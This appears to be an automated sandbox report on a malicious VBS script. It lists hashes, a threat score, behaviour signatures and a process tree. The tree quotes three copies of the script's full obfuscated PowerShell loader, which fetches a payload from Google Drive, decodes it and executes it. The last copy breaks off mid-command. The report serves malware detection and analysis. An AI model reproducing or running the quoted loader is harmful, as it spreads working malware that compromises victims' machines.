Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/09/2024, 01:45

General

  • Target

    c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c.vbs

  • Size

    20KB

  • MD5

    b4b8045f84ab0b8229af71524f891fb4

  • SHA1

    f43aad4d678ba2e259b5a357aecb19d3329e03e3

  • SHA256

    c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c

  • SHA512

    0424d77750ca1a1d78932162a5e4c223c805bdc3c82c960c24b2512d439992953b1aec2b872c09e18901a81a3fd02d5b08575d0edccf0ec0d5b5ef887aa6421d

  • SSDEEP

    384:ADlQ3GOmBsxCnQ8tcIgn9csOkKENYbXfzuzLfEO7FLpoMMqQW59Bh:B39cs8QqYesWEuXfnudoMDb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Time Discovery 1 TTPs 3 IoCs

    Adversaries may gather the system time and/or time zone settings from a local or remote system.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. 
PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. 
strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil 
nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
      2⤵
      • Blocklisted process makes network request
      • System Network Configuration Discovery: Internet Connection Discovery
      • System Time Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
        3⤵
          PID:2600
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. 
PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. 
strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil 
nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. 
PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. 
strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil 
nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N 